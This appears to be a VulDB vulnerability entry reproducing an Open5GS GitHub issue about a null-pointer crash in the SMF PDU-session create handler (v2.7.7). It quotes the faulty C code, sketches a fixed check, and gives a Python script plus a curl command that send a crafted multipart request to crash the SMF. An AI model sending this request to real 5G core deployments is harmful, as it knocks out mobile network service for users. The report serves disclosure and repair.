| Title | Open5gs SMF v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
SMF crashes when a `PduSessionCreateData` request for
`POST /nsmf-pdusession/v1/pdu-sessions` omits `vcnTunnelInfo`.
In `smf_nsmf_handle_create_data_in_hsmf()`, the code intends to reject a
missing or incomplete `vcnTunnelInfo`, but its error log dereferences
`vcnTunnelInfo` even inside the `!vcnTunnelInfo` branch:
```c
vcnTunnelInfo = PduSessionCreateData->vcn_tunnel_info;
if (!vcnTunnelInfo ||
    !(vcnTunnelInfo->ipv4_addr || vcnTunnelInfo->ipv6_addr) ||
    !vcnTunnelInfo->gtp_teid) {
    /* vcnTunnelInfo may be NULL here, yet the log arguments read its fields */
    ogs_error("[%s:%d] No vcnTunnelInfo [%s:%s:%s]",
        smf_ue->supi, sess->psi,
        vcnTunnelInfo->ipv4_addr ? vcnTunnelInfo->ipv4_addr : "NULL",
        vcnTunnelInfo->ipv6_addr ? vcnTunnelInfo->ipv6_addr : "NULL",
        vcnTunnelInfo->gtp_teid ? vcnTunnelInfo->gtp_teid : "NULL");
```
So the intended validation path turns into an immediate null-pointer crash.
This issue is not a duplicate of the existing callback reports in
`report/smf/`; it affects a different SBI route and a different SMF business
procedure.
As a control, the same request with a valid `vcnTunnelInfo` did not crash the
SMF and instead returned a normal `400` error for the next missing mandatory
field (`No Max Integrity Protected Data`), confirming that the crash is tied to
the absent `vcnTunnelInfo`.
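A minimal sketch of the intended validation with the NULL case split from the incomplete case, so the log path never reads fields of an absent object. This is an added example, not Open5GS code or the project's fix; `tunnel_info_t`, `validate_vcn_tunnel_info()` and `str_or_null()` are hypothetical names, and the sample values are constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the tunnel-info object; only the three
 * fields named in the report are modelled. */
typedef struct {
    const char *ipv4_addr;
    const char *ipv6_addr;
    const char *gtp_teid;
} tunnel_info_t;

/* Map a possibly-NULL string to something printf("%s") can take. */
static const char *str_or_null(const char *s) { return s ? s : "NULL"; }

/* Returns true when the tunnel info is usable. On failure, writes a
 * diagnostic into msg without ever dereferencing a NULL ti. */
bool validate_vcn_tunnel_info(const tunnel_info_t *ti, char *msg, size_t len)
{
    if (!ti) {
        /* Absent object: report the absence itself, touch no fields. */
        snprintf(msg, len, "No vcnTunnelInfo");
        return false;
    }
    if (!(ti->ipv4_addr || ti->ipv6_addr) || !ti->gtp_teid) {
        /* Object present but incomplete: its fields are safe to read. */
        snprintf(msg, len, "Incomplete vcnTunnelInfo [%s:%s:%s]",
                 str_or_null(ti->ipv4_addr), str_or_null(ti->ipv6_addr),
                 str_or_null(ti->gtp_teid));
        return false;
    }
    if (len)
        msg[0] = '\0';
    return true;
}

int main(void)
{
    char msg[128];
    tunnel_info_t partial = { "192.0.2.1", NULL, NULL };    /* constructed */
    tunnel_info_t full = { "192.0.2.1", NULL, "5BD60076" }; /* constructed */

    printf("%d %s\n", validate_vcn_tunnel_info(NULL, msg, sizeof msg), msg);
    printf("%d %s\n", validate_vcn_tunnel_info(&partial, msg, sizeof msg), msg);
    printf("%d %s\n", validate_vcn_tunnel_info(&full, msg, sizeof msg), msg);
    return 0;
}
```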
### Steps to reproduce
1. Ensure the Open5GS Docker lab is running and note the SMF IP:
```bash
docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' smf
```
2. Build a minimal multipart request with valid earlier fields but no
`vcnTunnelInfo`:
```bash
python3 - <<'PY'
from pathlib import Path
import json
boundary = 'BOUNDARY123'
body = {
    'supi': 'imsi-001011234567899',
    'pduSessionId': 1,
    'dnn': 'internet',
    'sNssai': {'sst': 1},
    'vsmfId': 'fake-vsmf',
    'servingNetwork': {'mcc': '001', 'mnc': '01'},
    'anType': '3GPP_ACCESS',
    'ratType': 'NR',
    'ueLocation': {'nrLocation': {
        'tai': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'tac': '000001'},
        'ncgi': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'nrCellId': '000000001'},
        'ueLocationTimestamp': '2026-04-10T20:56:16Z'
    }},
    'amfNfId': 'fake-amf',
    'guami': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'amfId': '000040'},
    'n1SmInfoFromUe': {'contentId': '5gnas-sm'}
}
# Minimal UE-to-SM payload in the gsmue format accepted by this handler:
n1 = bytes.fromhex('c191a1')
parts = []
parts.append(
    (f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode()) +
    json.dumps(body, separators=(',', ':')).encode() + b'\r\n'
)
parts.append(
    (f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n'
     f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode()) +
    n1 + b'\r\n'
)
parts.append(f'--{boundary}--\r\n'.encode())
Path('/tmp/pdu_create_missing_vcn.multipart').write_bytes(b''.join(parts))
PY
```
3. Send the request:
```bash
curl --http2-prior-knowledge -m 5 -sS -i \
  -X POST http://10.33.33.10/nsmf-pdusession/v1/pdu-sessions \
  -H 'Content-Type: multipart/related; boundary=BOUNDARY123' \
  --data-binary @/tmp/pdu_create_missing_vcn.multipart
```
4. Check SMF state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T20:56:16Z smf
```
### Logs
```shell
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T20:56:29.796110928Z
The process exited before emitting an application-level validation error for
this request.
```
### Expected behaviour
SMF should reject the malformed create request with a normal `400` error response.
### Observed Behaviour
The HTTP/2 stream is reset and the SMF process exits with code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Source | ⚠️ https://github.com/open5gs/open5gs/issues/4446 |
|---|
| User | FrankLin (UID 97501) |
|---|
| Submitted | 2026. 04. 20. PM 09:19 (1 month ago) |
|---|
| Moderation | 2026. 05. 10. PM 04:40 (20 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 362549 [Open5GS up to 2.7.7 SMF smf_nsmf_handle_create_data_in_hsmf denial of service] |
|---|
| Points | 20 |
|---|